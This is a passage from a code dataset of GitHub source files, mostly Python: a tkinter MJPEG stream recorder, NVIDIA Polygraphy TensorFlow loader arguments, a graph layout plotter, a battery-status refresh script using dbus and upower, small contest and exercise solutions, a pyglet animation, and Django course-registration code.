f'model/{FOLDER_NAME}'\ngifs_path = f'results/{FOLDER_NAME}/gifs'\ntrajectory_path = f'results/trajectory'\nlength_path = f'results/length'\n\nNUM_TEST = 100\nNUM_RUN = 1\nSAVE_GIFS = False # do you want to save GIFs\nSAVE_TRAJECTORY = False # do you want to save per-step metrics\nSAVE_LENGTH = False # do you want to save per-episode metrics\n","repo_name":"marmotlab/ARiADNE","sub_path":"test_parameter.py","file_name":"test_parameter.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"42453748105","text":"import tkinter as tk \nfrom tkinter import filedialog as fd\n\nimport cv2 as cv2\nimport time\nimport numpy as np\nimport PIL\nfrom PIL import Image, ImageTk\nimport tempfile\nimport shutil\nimport os\n\nclass App(tk.Frame): \n\tdef __init__(self, master=None):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.master.title(\"MJPEG App\")\n\t\tself.master.geometry('800x600')\n\t\tself.pack()\n\t\tself.create_widgets()\n\n\tdef create_widgets(self):\n\t\tself.lbl = tk.Label(self, text=\"Input stream URL\")\n\t\tself.lbl.grid(column=0, row=0)\n\n\t\tself.url_input = tk.Entry(self, width=30)\n\t\tself.url_input.grid(column=0, row=2)\n\n\t\tself.hi_there = tk.Button(self, text=\"GET URL\", command=self.get_url)\n\t\tself.hi_there.grid(column=1, row=2)\n\n\t\tself.download = tk.Button(self, text=\"DOWNLOAD\", command=self.save_image)\n\t\tself.download.grid(column=2, row=2)\n\n\t\tself.download = tk.Button(self, text=\"RECORD\", command=self.record)\n\t\tself.download.grid(column=3, row=2)\n\n\t\tself.download = tk.Button(self, text=\"STOP RECORD\", command=self.stop_record)\n\t\tself.download.grid(column=4, row=2)\n\t\n\tdef get_url(self): \n\t\turl = self.url_input.get()\n\t\timg = self.get_image(url)\n\t\tself.latest_image = img\n\t\timg_tk = ImageTk.PhotoImage(img)\n\t\tself.image_lbl = tk.Label(self, image=img_tk)\n\t\tself.image_lbl.image = img_tk\n\t\tself.image_lbl.grid(column=0, row=3)\n \n\tdef get_image(self, url):\n\t\tcap = cv2.VideoCapture(url)\n\t\tresult, frame = cap.read()\n\t\tif result: \n\t\t\ttemp_file = tempfile.TemporaryFile()\n\t\t\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\t\t\tpil_im = Image.fromarray(frame)\n\t\t\treturn pil_im\n\t\telse: \n\t\t\tprint(\"Fail\")\n\n\tdef save_image(self): \n\t\tself.filename = fd.asksaveasfile(mode='w', defaultextension='.jpg')\n\t\tself.latest_image.save(self.filename)\n\t\n\tdef find_dimensions(self, url):\n\t\tcap = cv2.VideoCapture(url)\n\t\tdimensions = (640, 360) #width, height\n\n\t\t# Let us first figure out the dimensions of the video \n\t\ttry:\n\t\t\tresult, frame = cap.read()\n\t\t\tif result: \n\t\t\t\treturn frame.shape\n\t\t\telse: \n\t\t\t\tprint(\"Error in first grab\")\n\t\t\t\treturn dimensions \n\t\texcept Exception as e: \n\t\t\tprint(e)\n\n\tdef calculate_frame_rate(url):\n\t\tcap = cv2.VideoCapture(url)\n\t\tnum_frames = 30\n\n\t\t# Start time \n\t\tstart = time.time()\n\n\t\tfor i in range(0, num_frames):\n\t\t\tret, frame = cap.read()\n\n\t\t# Start time \n\t\t\tend = time.time()\n\n\t\treturn int((num_frames/(end - start)) * 2)\n\t\n\tdef stop_record(self): \n\t\tself.recording = False\n\n\tdef record(self, args={'framerate': 10}):\n\t\tprint(\"Finding dimensions\")\n\t\turl = self.url_input.get()\n\t\tself.recording = True\n\t\tdimensions = self.find_dimensions(url)\n\n\t\tfourcc = cv2.VideoWriter_fourcc(*'MP4V')\n\t\twriter = cv2.VideoWriter('../output--{0}.mp4'.format(time.strftime('%y-%m-%d-%H-%M')), fourcc, args['framerate'], (dimensions[1], dimensions[0]))\n\n\t\ttry: \n\t\t\tif hasattr(args, 'mjpeg') == False or args['mjpeg'] == True:\n\t\t\t\tcap = cv2.VideoCapture(url)\n\n\t\t\twhile(self.recording):\n\t\t\t\ttry: \n\t\t\t\t\tif 'mjpeg' in args and args['mjpeg'] != True:\n\t\t\t\t\t\tcap = cv2.VideoCapture(url)\n\n\t\t\t\t\t\tresult, frame = cap.read()\n\t\t\t\t\t\tif result == False: \n\t\t\t\t\t\t\tprint(\"Error in cap.read()\") # this is for preventing a breaking error \n\t\t\t\t\t\t\t# break; \n\t\t\t\t\t\t\tpass; \n\t\t\t\t\t\tplt.imshow(frame)\n\t\t\t\t\t\twriter.write(frame)\n\t\t\t\t\t\tplt.show()\n\n\t\t\t\t\tif 'mjpeg' in args and args['mjpeg'] != True:\n\t\t\t\t\t\tcap.release()\n\n\t\t\t\texcept Exception as e: \n\t\t\t\t\tprint(e)\n\t\t\t\t\tclear_output(wait=True)\n\t\texcept KeyboardInterrupt:\n\t\t\tcap.release()\n\t\t\twriter.release()\n\t\t\tcv2.destroyAllWindows()\n\nroot = tk.Tk()\napp = App(master=root)\napp.mainloop()","repo_name":"jonathanstyu/python-videoscraper-desktopapp","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70315586727","text":"from polygraphy import mod, util\nfrom polygraphy.logger import G_LOGGER, LogMode\nfrom polygraphy.tools.args import util as args_util\nfrom polygraphy.tools.args.base import BaseArgs\nfrom polygraphy.tools.args.model import ModelArgs\nfrom polygraphy.tools.script import make_invocable\n\n\n@mod.export()\nclass TfTrtArgs(BaseArgs):\n \"\"\"\n [UNTESTED] TensorFlow-TensorRT Integration: TensorFlow-TensorRT.\n\n Depends on:\n\n - TrtConfigArgs\n - TrtLegacyRunnerArgs\n \"\"\"\n\n def add_parser_args_impl(self):\n self.group.add_argument(\n \"--tftrt\",\n \"--use-tftrt\",\n help=\"Enable TF-TRT integration\",\n action=\"store_true\",\n default=None,\n dest=\"use_tftrt\",\n )\n self.group.add_argument(\n \"--minimum-segment-size\",\n help=\"Minimum length of a segment to convert to TensorRT\",\n type=int,\n default=None,\n )\n self.group.add_argument(\n \"--dynamic-op\",\n help=\"Enable dynamic mode (defers engine build until runtime)\",\n action=\"store_true\",\n default=None,\n )\n\n def parse_impl(self, args):\n \"\"\"\n Parses command-line arguments and populates the following attributes:\n\n Attributes:\n use_tftrt (bool): Whether to use TF-TRT.\n minimum_segment_size (int): The minimum size of segments offloaded to TRT.\n dynamic_op (bool): Whether to enable dynamic mode, which defers engine building until runtime.\n \"\"\"\n self.use_tftrt = args_util.get(args, \"use_tftrt\")\n self.minimum_segment_size = args_util.get(args, \"minimum_segment_size\")\n self.dynamic_op = args_util.get(args, \"dynamic_op\")\n\n def add_to_script_impl(self, script, loader_name=None, suffix=None):\n \"\"\"\n Args:\n loader_name (str): The name of the loader which should be consumed by the ``UseTfTrt`` loader.\n \"\"\"\n if self.use_tftrt:\n from polygraphy.tools.args.backend.trt import TrtConfigArgs\n from polygraphy.tools.args.backend.trt_legacy import TrtLegacyRunnerArgs\n\n script.add_import(imports=[\"UseTfTrt\"], frm=\"polygraphy.backend.tf\")\n loader_str = make_invocable(\n \"UseTfTrt\",\n loader_name,\n max_workspace_size=self.arg_groups[TrtConfigArgs]._workspace,\n fp16=self.arg_groups[TrtConfigArgs].fp16,\n int8=self.arg_groups[TrtConfigArgs].int8,\n max_batch_size=self.arg_groups[TrtLegacyRunnerArgs].batch_size,\n is_dynamic_op=self.dynamic_op,\n minimum_segment_size=self.minimum_segment_size,\n )\n loader_name = script.add_loader(loader_str, \"use_tftrt\", suffix=suffix)\n return loader_name\n\n\n@mod.export()\nclass TfLoadArgs(BaseArgs):\n \"\"\"\n TensorFlow Model Loading: loading TensorFlow models.\n\n Depends on:\n\n - ModelArgs\n - TfTrtArgs: if allow_tftrt == True\n - TrtSaveEngineBytesArgs: if allow_tftrt == True\n \"\"\"\n\n def __init__(self, allow_artifacts: bool = None, allow_custom_outputs: bool = None, allow_tftrt: bool = None):\n \"\"\"\n Args:\n allow_artifacts (bool):\n Whether to allow saving artifacts to the disk, like frozen models or TensorBoard visualizations.\n Defaults to True.\n allow_custom_outputs (bool):\n Whether to allow marking custom output tensors.\n Defaults to True.\n allow_tftrt (bool):\n Whether to allow applying TF-TRT.\n Defaults to False.\n\n \"\"\"\n super().__init__()\n self._allow_artifacts = util.default(allow_artifacts, True)\n self._allow_custom_outputs = util.default(allow_custom_outputs, True)\n self._allow_tftrt = util.default(allow_tftrt, False)\n\n def add_parser_args_impl(self):\n self.group.add_argument(\n \"--ckpt\",\n help=\"[EXPERIMENTAL] Name of the checkpoint to load. Required if the `checkpoint` file is missing. Should not include file extension \"\n \"(e.g. to load `model.meta` use `--ckpt=model`)\",\n default=None,\n )\n if self._allow_custom_outputs:\n self.group.add_argument(\n \"--tf-outputs\",\n help=\"Name(s) of TensorFlow output(s). \"\n \"Using '--tf-outputs mark all' indicates that all tensors should be used as outputs\",\n nargs=\"+\",\n default=None,\n )\n\n if self._allow_artifacts:\n self.group.add_argument(\n \"--save-pb\",\n help=\"Path to save the TensorFlow frozen graphdef\",\n default=None,\n dest=\"save_frozen_graph_path\",\n )\n self.group.add_argument(\n \"--save-tensorboard\",\n help=\"[EXPERIMENTAL] Path to save a TensorBoard visualization\",\n default=None,\n dest=\"save_tensorboard_path\",\n )\n\n self.group.add_argument(\n \"--freeze-graph\", help=\"[EXPERIMENTAL] Attempt to freeze the graph\", action=\"store_true\", default=None\n )\n\n def parse_impl(self, args):\n \"\"\"\n Parses command-line arguments and populates the following attributes:\n\n Attributes:\n ckpt (str): Name of the checkpoint.\n outputs (List[str]): Names of output tensors.\n save_frozen_graph_path (str): The path at which the frozen graph will be saved.\n save_tensorboard_path (str): The path at which the TensorBoard visualization will be saved.\n freeze_graph (bool): Whether to attempt to freeze the graph.\n \"\"\"\n self.ckpt = args_util.get(args, \"ckpt\")\n self.outputs = args_util.get_outputs(args, \"tf_outputs\")\n self.save_frozen_graph_path = args_util.get(args, \"save_frozen_graph_path\")\n self.save_tensorboard_path = args_util.get(args, \"save_tensorboard_path\")\n self.freeze_graph = args_util.get(args, \"freeze_graph\")\n\n def add_to_script_impl(self, script, disable_custom_outputs=None):\n \"\"\"\n Args:\n disable_custom_outputs (bool):\n Whether to disallow modifying outputs according to the `outputs` attribute.\n Defaults to False.\n \"\"\"\n\n model_file = self.arg_groups[ModelArgs].path\n model_type = self.arg_groups[ModelArgs].model_type\n\n if model_type == \"ckpt\":\n G_LOGGER.verbose(\n f\"Loading a TensorFlow checkpoint from {model_file}. Please ensure you are not using the --use-subprocess flag\",\n mode=LogMode.ONCE,\n )\n script.add_import(imports=[\"GraphFromCkpt\"], frm=\"polygraphy.backend.tf\")\n loader_id = \"load_ckpt\"\n loader_str = make_invocable(\"GraphFromCkpt\", model_file, self.ckpt)\n elif model_type == \"keras\":\n script.add_import(imports=[\"GraphFromKeras\"], frm=\"polygraphy.backend.tf\")\n loader_id = \"load_keras\"\n loader_str = make_invocable(\"GraphFromKeras\", model_file)\n elif model_type == \"frozen\":\n script.add_import(imports=[\"GraphFromFrozen\"], frm=\"polygraphy.backend.tf\")\n G_LOGGER.verbose(\n \"Attempting to load as a frozen graph. If this is not correct, please specify --model-type\",\n mode=LogMode.ONCE,\n )\n loader_id = \"load_frozen\"\n loader_str = make_invocable(\"GraphFromFrozen\", model_file)\n else:\n G_LOGGER.critical(f\"Model type: {model_type} cannot be imported with TensorFlow.\")\n\n loader_name = script.add_loader(loader_str, loader_id)\n\n if self.freeze_graph:\n script.add_import(imports=[\"OptimizeGraph\"], frm=\"polygraphy.backend.tf\")\n loader_name = script.add_loader(make_invocable(\"OptimizeGraph\", loader_name), \"optimize_graph\")\n\n engine_dir = None\n if self._allow_tftrt:\n from polygraphy.tools.args.backend.trt import TrtSaveEngineBytesArgs\n\n loader_name = self.arg_groups[TfTrtArgs].add_to_script(script, loader_name)\n engine_dir = self.arg_groups[TrtSaveEngineBytesArgs].path\n\n MODIFY_TF = \"ModifyGraphOutputs\"\n outputs = None if disable_custom_outputs else args_util.get_outputs_for_script(script, self.outputs)\n modify_tf_str = make_invocable(MODIFY_TF, loader_name, outputs=outputs)\n if modify_tf_str != make_invocable(MODIFY_TF, loader_name):\n script.add_import(imports=[MODIFY_TF], frm=\"polygraphy.backend.tf\")\n loader_name = script.add_loader(modify_tf_str, \"modify_tf\")\n\n WRITE_TF = \"SaveGraph\"\n write_tf_str = make_invocable(\n WRITE_TF,\n loader_name,\n path=self.save_frozen_graph_path,\n tensorboard_dir=self.save_tensorboard_path,\n engine_dir=engine_dir,\n )\n if write_tf_str != make_invocable(WRITE_TF, loader_name):\n script.add_import(imports=[WRITE_TF], frm=\"polygraphy.backend.tf\")\n loader_name = script.add_loader(write_tf_str, \"save_tf\")\n\n return loader_name\n\n def load_graph(self):\n \"\"\"\n Loads a TensorFlow graph according to arguments provided on the command-line.\n\n Returns:\n tf.Graph\n \"\"\"\n loader = args_util.run_script(self.add_to_script)\n return loader()\n","repo_name":"NVIDIA/TensorRT","sub_path":"tools/Polygraphy/polygraphy/tools/args/backend/tf/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":9576,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"} +{"seq_id":"5652522492","text":"\"\"\"Utilities for manipulating binary strings/masks.\"\"\"\n__author__ = \"David Warde-Farley\"\n__copyright__ = \"Copyright 2012, Universite de Montreal\"\n__credits__ = [\"David Warde-Farley\"]\n__license__ = \"3-clause BSD\"\n__email__ = \"wardefar@iro\"\n__maintainer__ = \"David Warde-Farley\"\n\nimport numpy as np\nfrom theano.compat.six.moves import xrange\n\n\ndef all_bit_strings(bits, dtype='uint8'):\n \"\"\"\n Create a matrix of all binary strings of a given width as the rows.\n\n Parameters\n ----------\n bits : int\n The number of bits to count through.\n\n dtype : str or dtype object\n The dtype of the returned array.\n\n Returns\n -------\n bit_strings : ndarray, shape (2 ** bits, bits)\n The numbers from 0 to 2 ** bits - 1 as binary numbers, most\n significant bit first.\n\n Notes\n -----\n Obviously the memory requirements of this are exponential in the first\n argument, so use with caution.\n \"\"\"\n return np.array([[int(x) for x in np.binary_repr(i, width=bits)]\n for i in xrange(0, 2 ** bits)], dtype=dtype)\n","repo_name":"lisa-lab/pylearn2","sub_path":"pylearn2/utils/bit_strings.py","file_name":"bit_strings.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":2743,"dataset":"github-code","pt":"53"} +{"seq_id":"16154538144","text":"#coding=utf-8\nimport networkx as nx\nfrom matplotlib import pyplot\nimport numpy as np\nimport argparse\nimport warnings\nimport random\n\n\ndef fxn():\n warnings.warn(\"deprecated\", DeprecationWarning)\n\ndef normalize(Y):\n Y_cpy = Y.copy()\n # Translate s.t. smallest values for both x and y are 0.\n for dim in range(Y.shape[1]):\n Y_cpy[:, dim] += -Y_cpy[:, dim].min()\n # Scale s.t. max(max(x, y)) = 1 (while keeping the same aspect ratio!)\n scaling = 1 / (np.absolute(Y_cpy).max())\n Y_cpy *= scaling\n return Y_cpy\n\ndef load_graphpos(filename):\n nnode = 0\n dim = 0\n with open(filename) as f:\n header = f.readline()\n nnode,dim = [int(i) for i in header.split()]\n rawdata = np.loadtxt(filename,dtype=float,skiprows=1)\n data = [(n[0],n[1]) for n in rawdata]\n return nnode, dim, np.array(data)\n\ndef txtToPng(layout, outpng, graph):\n G=nx.Graph()\n nnode, dim, Y = load_graphpos(layout)\n data = normalize(Y)\n\n index = 0\n while index < nnode:\n i = data[index][0]\n j = data[index][1]\n G.add_node(index, pos=(i,j))\n index += 1\n\n f = open(graph)\n line = f.readline()\n l1 = line.split(' ')\n nnode = int(l1[0])\n nedge = int(l1[1])\n index = 0\n while line:\n line = f.readline()\n ll = line.split(' ')\n if len(ll) < 3:\n continue\n i = int(ll[0])\n j = int(ll[1])\n if i == j:\n continue\n if nedge < 600000:\n G.add_edges_from([(i,j)])\n elif nedge < 3000000:\n if random.randint(0, 9) == 0:\n G.add_edges_from([(i,j)])\n else:\n if random.randint(0, 99) == 0:\n G.add_edges_from([(i,j)])\n\n index += 1\n f.close()\n pos=nx.get_node_attributes(G,'pos')\n edges = G.edges()\n edge_length = []\n edge_length = [np.sqrt((pos[x][0]-pos[y][0])**2 + (pos[x][1]-pos[y][1])**2) for (x,y) in edges]\n edge_length = np.array(edge_length)\n edge_length = edge_length - np.min(edge_length)\n edge_length = edge_length / np.max(edge_length)\n\n pyplot.axis('off')\n set_width = 0.2\n if nedge < 5000:\n set_width = 0.4\n elif nedge > 400000:\n set_width = 0.02\n\n nx.draw_networkx(G,pos, node_color='white',node_size=0, alpha=1, width = set_width, with_labels=False, edge_color = edge_length, edge_cmap = pyplot.get_cmap('jet_r'))\n pyplot.savefig(outpng, dpi = 300, pad_inches = 0)\n pyplot.close('all')\n print(\"visualize complete!\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-graph', default = '', help = 'Input graphs')\n parser.add_argument('-layout', default = '', help = 'Graph layout result')\n parser.add_argument('-outpng', default = '', help = 'Visualization result')\n\n args = parser.parse_args()\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n txtToPng(args.layout, args.outpng, args.graph)\n fxn()\n\n","repo_name":"ZJUVAI/DRGraph","sub_path":"visualization/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"16123694604","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Source:\n# https://askubuntu.com/questions/878556/get-battery-status-to-update-more-often-or-on-ac-power-wake\n\nimport dbus\nimport os\nimport sys\nimport time\n\ndef run_dbus_method(bus_type, obj, path, interface, method, arg):\n if bus_type == \"session\":\n bus = dbus.SessionBus()\n elif bus_type == \"system\":\n bus = dbus.SystemBus()\n else:\n return None\n\n proxy = bus.get_object(obj, path)\n dbus_method = proxy.get_dbus_method(method, interface)\n\n return dbus_method(arg) if arg else dbus_method()\n\ndef find_battery_path():\n call = [ 'system', 'org.freedesktop.UPower', \n '/org/freedesktop/UPower', 'org.freedesktop.UPower',\n 'EnumerateDevices', None ]\n devices = run_dbus_method(*call)\n for i in devices:\n if 'BAT' in i: return str(i)\n\ndef main():\n bat_path = find_battery_path()\n call = [ 'system', 'org.freedesktop.UPower',\n bat_path, 'org.freedesktop.UPower.Device',\n 'Refresh', None ]\n\n run_dbus_method(*call)\n # Call upower, parse the output and write the energy rate without context to a file\n # The energy rate uses a \",\" as decimal separator for certain locales which needs to be replaced for parsing.\n os.system(\"upower -i $(upower -e | grep BAT) | grep energy-rate | grep -Eo '[0-9]+([,|.][0-9]+)?' | sed 's/,/./' > .energyrate\")\n os.system(\"upower -i $(upower -e | grep BAT) | grep state | rev | cut -d ' ' -f 1 | rev > .batterystate\")\n\nif __name__ == '__main__': main()","repo_name":"linuxmint/cinnamon-spices-applets","sub_path":"batterypower@joka42/files/batterypower@joka42/update_upower.py","file_name":"update_upower.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":535,"dataset":"github-code","pt":"53"} +{"seq_id":"31384753177","text":"with open('herding.in','r') as fin:\n lines=fin.readlines()\n\ncows=list(map(int,lines[0].split()))\ndistances=[cows[1]-cows[0],cows[2]-cows[1]]\n\nif distances[0]==1 and distances[1]==1:\n min_moves=0\n max_moves=0\nelse:\n if distances[0]==2 or distances[1]==2:\n min_moves=1\n else:\n min_moves=2\n if distances[0]>distances[1]:\n max_moves=distances[0]-1\n else:\n max_moves=distances[1]-1\n\nwith open('herding.out','w') as fout:\n fout.write(str(min_moves)+'\\n')\n fout.write(str(max_moves)+'\\n')\n","repo_name":"RithvikKo/usaco","sub_path":"2018-19/bronze/feb/herding.py","file_name":"herding.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72767329769","text":"\"\"\"this program is a graphical representation of two randomly moving triangles\"\"\"\n\nimport pyglet\nimport pyglet.gl\nimport colors\nimport random\nfrom triangleClass import triangleClass\n\n# initialise a list of triangles\ntriangles = []\n\n# populate the list of triangles\ntriangles.append(triangleClass('triangle1', 'hotpink', 0, 0, 20))\ntriangles.append(triangleClass('triangle2', 'green', 0, 0, 20))\ntriangles.append(triangleClass('triangle3', 'cyan', 0, 0, 20))\ntriangles.append(triangleClass('triangle4', 'red', 0, 0, 20))\ntriangles.append(triangleClass('triangle5', 'yellow', 0, 0, 20))\n\nclass graphicsWindow(pyglet.window.Window):\n def __init__(self):\n vmax = 10 # Maximum velocity for rng\n thetaParameter = 10 # Maximum theta\n super(graphicsWindow, self).__init__() # constructor for graphicsWindow class\n\n for i in range(0, len(triangles)):\n # set inital coordinates of the centre of the triangles\n triangles[i].setCentreCoordinates(self.width / 2, self.height / 2)\n triangles[i].updateVertices()\n # set initial velocities of each triangle\n triangles[i].setVelocity(random.randint(-vmax, vmax), random.randint(-vmax, vmax))\n triangles[i].setThetaIncrement(random.gauss(0, thetaParameter))\n triangles[i].setSpringConstants(random.uniform(0.0001, 0.01), random.uniform(0.0001, 0.01))\n\n def update(self, dt):\n #print (\"Updating the center of the triangles\")\n for i in range(0, len(triangles)):\n triangles[i].updateCentreCoordinates(self.width, self.height)\n triangles[i].updateVertices()\n triangles[i].updateTheta()\n triangles[i].rotateVertices()\n triangles[i].updateAccn(self.width / 2, self.height / 2)\n triangles[i].updateVelocity()\n\n def on_draw(self):\n # clear the graphics buffer\n pyglet.gl.glClear(pyglet.gl.GL_COLOR_BUFFER_BIT)\n\n for i in range(0, len(triangles)):\n # calculate list of vertices to draw triangle\n vertexList = triangles[i].getVertices()\n # use pyGlet to draw lines between the vertices\n lineColor = triangles[i].getColor()\n pyglet.gl.glColor3f(colors.color[lineColor][0],colors.color[lineColor][1],colors.color[lineColor][2]) # specify colors\n vertexList.draw(pyglet.gl.GL_LINE_LOOP) # draw\n\n# this is the main game engine loop\nif __name__ == '__main__':\n window = graphicsWindow() # initialize a window class\n pyglet.clock.schedule_interval(window.update, 1 / 60.0) # tell pyglet the on_draw() & update() timestep\n pyglet.app.run() # run pyglet","repo_name":"davidglo/TMCS-2018-freshStart","sub_path":"game_projects/zack-game/source/triangles.py","file_name":"triangles.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43073975977","text":"from tkinter import Toplevel\nfrom tkinter import Label\nfrom tkinter import Entry\nfrom tkinter import Button\nfrom tkinter import filedialog\nimport tkinter as tk\n\n\nclass NewProjectWindow:\n\n def __init__(self, parent, model):\n self.model = model\n self.parent = parent\n self.window = Toplevel(parent.window)\n self.window.title('Nowy projekt')\n self.window.geometry('600x90')\n self.window.rowconfigure(0, weight=1)\n self.window.rowconfigure(1, weight=1)\n self.window.columnconfigure(1, weight=1)\n Label(self.window, text='Nazwa projektu:').grid(row=0, sticky=tk.NW+tk.N+tk.S)\n self.name_entry = Entry(self.window)\n self.name_entry.grid(row=0, column=1, columnspan=2, sticky=tk.NW+tk.N+tk.S+tk.E)\n Label(self.window, text='Ścieżka do projektu:').grid(row=1, column=0, sticky=tk.NW+tk.N+tk.S)\n self.path_label = Label(self.window, anchor=tk.W, bg='white', width=40)\n self.path_label.grid(row=1, column=1, sticky=tk.NW+tk.N+tk.S+tk.E)\n Button(self.window, text='Wybierz', command=self.pick_dir).grid(row=1, column=2, sticky=tk.NW+tk.N+tk.S)\n Button(self.window, text='Anuluj', command=self.destroy).grid(row=2, column=0, sticky=tk.NW + tk.N + tk.S+tk.E)\n Button(self.window, text='Stwórz', command=self.create).grid(row=2, column=2, sticky=tk.NW + tk.N + tk.S+tk.E)\n\n def pick_dir(self):\n options = {}\n options['defaultextension'] = '.afz'\n options['filetypes'] = [('Pliki projektu', '.afz'), ('Wszystkie pliki', '.*')]\n options['title'] = 'Utwórz projekt'\n filename = filedialog.asksaveasfilename(**options)\n self.path_label.config(text=filename)\n\n def create(self):\n self.model.new_project(self.path_label['text'], self.name_entry.get())\n self.destroy()\n\n def destroy(self):\n self.window.destroy()\n","repo_name":"Thun0/dev-fuzz","sub_path":"view/newprojectwindow.py","file_name":"newprojectwindow.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40255402154","text":"\r\nimport numpy as np\r\n\r\n\r\ndef CalculatedTerms(numerator_p,denominator_p,numberOfTerms):\r\n lengthToAppend = abs(len(numerator_p) - len(denominator_p))\r\n zeros = np.zeros(lengthToAppend) \r\n numerator = np.append(numerator_p,zeros)\r\n denominator = np.array(denominator_p)\r\n print(numerator)\r\n print(denominator)\r\n print('---------------')\r\n\r\n result = []\r\n nextnumberAddition = 0\r\n arrayOfArrays = []\r\n arrayOfArrays.append(numerator) \r\n a = numerator[0]/denominator[0]\r\n result.append(a)\r\n A_r = -(a)\r\n #print('')\r\n #print(A_r)\r\n #print('')\r\n\r\n for i in range(1,numberOfTerms):\r\n #print(arrayOfArrays[i-1])\r\n p = np.multiply(denominator,A_r)\r\n #print(p)\r\n z = np.add(arrayOfArrays[i-1],p)\r\n z_n = np.delete(z,0)\r\n z_new = np.append(z_n,0)\r\n arrayOfArrays.append(z_new)\r\n a = (arrayOfArrays[i][0])/denominator[0]\r\n result.append(a)\r\n A_r = -a\r\n \r\n #CompletedResult = np.append(zeros,result)\r\n print(result)\r\n\r\nx = [0, 0, 0.577,-1.809,2.10,-1.070,0.202, 0]\r\ny = [1,-0.021,-3.629,2.453,1.880,-2.353,0.751,-0.078]\r\n\r\n\r\n\r\nCalculatedTerms(x,y,7)\r\n\r\n\r\n","repo_name":"NA-56/InverseZTransform_Python","sub_path":"DirectDivisionMethod/DirectPolyDivision.py","file_name":"DirectPolyDivision.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12969642637","text":"# Python Class 1889\n# Lesson 2 Problem 4 Part (a)\n# Author: madmathninja (272729)\n\ndef permute(inputList):\n '''permute(inputList) -> list\n returns list of all permutations of inputList'''\n if len(inputList) == 0:\n return []\n if len(inputList) == 1:\n return[inputList]\n\n perms = []\n\n for i in range(len(inputList)):\n ele = inputList[i]\n\n remPerms = inputList[:i] + inputList[i+1:]\n\n for p in permute(remPerms):\n perms.append([ele] + p)\n return perms\n\n# test cases\nprint(permute([1,2]))\n# should print [[1,2], [2,1]] in some order\nprint(permute([1,2,3]))\n# should print [[1,2,3], [1,3,2], [2,1,3], [3,1,2], [2,3,1], [3,2,1]] in some order","repo_name":"matthewru/PythonLearning","sub_path":"AOPS_Intermediate_Python/Week2/ChallengeProblem4a.py","file_name":"ChallengeProblem4a.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42471537072","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom .views import *\nurlpatterns = [\n path('', inicio, name=\"inicio\"),\n path(\"base/\",base),\n path('productos/', productos,name=\"productos\"),\n path('empleados/',empleados,name=\"empleados\"),\n path('clientes/',clientes,name=\"clientes\"),\n path('about/',about,name=\"about\"),\n path('crearproducto/',crear_producto,name=\"crear_producto\"),\n path('crearempleado/',crear_empleado,name=\"crear_empleado\"),\n path('crearcliente/',crear_cliente,name=\"crear_cliente\"),\n path('buscarproducto/',buscar_producto,name='busqueda_producto'),\n path('verproducto//',ver_producto, name='verproducto'),\n path(\"editarproducto//\",editar_producto,name=\"editarproducto\"),\n path(\"eliminarproducto//\",eliminar_producto,name=\"eliminarproducto\"),\n path(\"editarempleado//\",editar_empleado,name=\"editarempleado\"),\n path(\"eliminarempleado//\",eliminar_empleado,name=\"eliminarempleado\"),\n path(\"editarcliente//\",editar_cliente,name=\"editarcliente\"),\n path(\"eliminarcliente//\",eliminar_cliente,name=\"eliminarcliente\"),\n path('login', login_request, name=\"login\"), \n path('register', register_request, name=\"register\"),\n path('logout', logout_request, name=\"logout\"),\n]","repo_name":"Fbarbero10/ecommerce-master","sub_path":"ecommerce-master/ComercioApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74739416489","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom accounts.models import Student\nfrom coursereg.models import CourseReg\nfrom coursereg.serializers import CourseRegSerializer\nfrom courseresult.models import CourseResult\nfrom coursetomajor.models import CourseToMajor\nfrom coursetomajor.serializers import CourseToMajorSerializer\nfrom coursewaving.models import WavedCourses\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef registrable_courses(request):\n req = request.GET\n courses = []\n outstandings = []\n\n student = Student.objects.get(pk=req['student'])\n\n course_to_major = CourseToMajor.objects.filter(major=student.major,\n level__level__lte=student.level.level)\n registered_courses = CourseReg.objects.filter(student=student.id,\n session=req['session'])\n result = CourseResult.objects.filter(student=student.id)\n wavings = WavedCourses.objects.filter(student=student.id)\n\n session_courses = course_to_major.filter(level=student.level.id)\n\n for c in session_courses:\n try:\n wavings.get(course=c.course.id)\n not_in_wavings = False\n except WavedCourses.DoesNotExist:\n not_in_wavings = True\n\n try:\n 